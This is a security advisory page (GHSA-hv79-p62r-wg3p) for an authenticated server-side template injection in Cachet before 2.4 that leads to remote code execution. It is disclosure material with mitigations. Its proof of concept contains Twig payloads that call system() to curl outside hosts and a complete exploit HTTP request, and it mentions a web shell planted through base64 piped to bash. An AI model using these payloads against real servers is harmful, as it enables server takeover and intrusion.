GHSA-hv79-p62r-wg3p

Suggest an improvement
Source
https://github.com/advisories/GHSA-hv79-p62r-wg3p
Import Source
https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2023/10/GHSA-hv79-p62r-wg3p/GHSA-hv79-p62r-wg3p.json
JSON Data
https://api.osv.dev/v1/vulns/GHSA-hv79-p62r-wg3p
Aliases
Published
2023-10-16T14:20:53Z
Modified
2024-02-16T08:24:52.775257Z
Severity
  • 9.1 (Critical) CVSS_V3 - CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:L/A:L CVSS Calculator
Summary
Cachet vulnerable to Authenticated Remote Code Execution
Details

Summary

A template functionality which allows users to create templates allows them to execute any code on the server during the bad filtration and old twig version. Within /cachet/app/Http/Routes/ApiRoutes.php, and attacker could control template input which is passed to laravel's dispatched handler /cachet/app/Bus/Handlers/Commands/Incident/CreateIncidentCommandHandler.php. If an attacker is able to control this data, they may be able to trigger a server-side template injection vulnerability which can lead to remote code execution.

This vulnerability does not exist within the Twig library itself, but exists during the process of the Cachet processing of the data without any filtration. This has been patched in Cachet version 2.4.

PoC

  1. Log in as a default user (non-admin);
  2. Create an incident with name slug1 and with content: {{ ['curl yourhost.com','']|sort('system') }} or with any other content for Remote code execution via the Twig, for instance: {{[0]|reduce('system','curl yourhost.com')}};
  3. Get an API token from your account settings (X-Cachet-Token);
  4. Trigger remote code execution using the api route:

    POST /api/v1/incidents HTTP/1.1
    Host: myapp
    Cache-Control: max-age=0
    Upgrade-Insecure-Requests: 1
    User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/116.0.0.0 Safari/537.36
    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
    Accept-Encoding: gzip, deflate
    Accept-Language: en-GB,en-US;q=0.9,en;q=0.8
    Cookie: XSRF-TOKEN=eyJpdiI6InZUVVpkRmx1VFlhcytVQkQ1Zk81b1E9PSIsInZhbHVlIjoiSlE0Tmt1cjVoRHFSOHBIR3RoYlAwS0dNZlVHbm02d0tWVW1ERVRvblZTTW1TMHV2MFJUYTNwQWQyZ3pQM1VlMyIsIm1hYyI6IjU4YzAxZjgyYWE4YTU4MTExMDQ3OGRhOTNlYThlZTYxMzI5YzBhMWVhM2RjYzA2ODgzMGVhMGQ5Njg2YTMyMjkifQ%3D%3D; laravel_session=eyJpdiI6IldZcHhMSjBYRmQzUXdGTTRQbGFQTWc9PSIsInZhbHVlIjoiSkRxWncxdWs3Y29ZcXVHMlJ0U2pVVVwvMGdvSUJNK2pEMnhsR2QzVnE1MmMxMWJxUm96K1VnalwvS1pYcXE2cGllIiwibWFjIjoiMDM0MGIxNjRlM2VhOGU5Mzg2OWVkYjZjNmJhY2JlMTE3OTdkMDRkZTQ1NzI5NTMzNzI4YjA5YTcwNzM2M2E5YyJ9
    Connection: close
    X-Cachet-Token: OeiLJ6G6kjsBXeyOo97z
    Content-Length: 109
    Content-type: application/json
    
    {"template":"slug1", "name":"{{ ['curl pwned.riven.pw','']|sort('system') }}", "status":2, "visible":1}
    
  5. Obtain remote code execution. An attacker could also upload a web-shell using some base64 tricks with pipe to bash.

Impact

Server-side template injection is when an attacker is able to use native template syntax to inject a malicious payload into a template, which is then executed server-side. Template engines are designed to generate web pages by combining fixed templates with volatile data. Server-side template injection attacks can occur when user input is concatenated directly into a template, rather than passed in as data. This allows attackers to inject arbitrary template directives in order to manipulate the template engine, often enabling them to take complete control of the server. As the name suggests, server-side template injection payloads are delivered and evaluated server-side, potentially making them more dangerous than a typical client-side template injection.

Mitigation

  1. Update TWIG to the latest version;
  2. Filter user-controlled data by any safe pattern;
  3. Use sandboxed twig mode;
  4. Don't allow users (non-admins) to trigger this vulnerability via the API endpoint.
References

Affected packages

Packagist / cachethq/cachet

Package

Name
cachethq/cachet
Purl
pkg:composer/cachethq/cachet

Affected ranges

Type
ECOSYSTEM
Events
Introduced
0Unknown introduced version / All previous versions are affected
Fixed
2.4

Affected versions

v0.*

v0.1.0-alpha

v1.*

v1.0.0
v1.1.0
v1.1.1
v1.2.0
v1.2.1

v2.*

v2.0.0-beta1
v2.0.0-beta2
v2.0.0-RC1
v2.0.0-RC2
v2.0.0-RC3
v2.0.0-RC4
v2.0.0-RC5
v2.0.0
v2.0.1
v2.0.2
v2.0.3
v2.0.4
v2.1.0-RC1
v2.1.0-RC2
v2.1.0
v2.1.1
v2.1.2
v2.2.0-RC1
v2.2.0
v2.2.1
v2.2.2
v2.2.3
v2.2.4
v2.3.0-RC1
v2.3.0-RC2
v2.3.0-RC3
v2.3.0-RC4
v2.3.0-RC5
v2.3.0-RC6
v2.3.0
v2.3.1
v2.3.2
v2.3.3
v2.3.4
v2.3.5
v2.3.6
v2.3.7
v2.3.8
v2.3.9
v2.3.10
v2.3.11
v2.3.12
v2.3.13
v2.3.14
v2.3.15
v2.3.16
v2.3.17
v2.3.18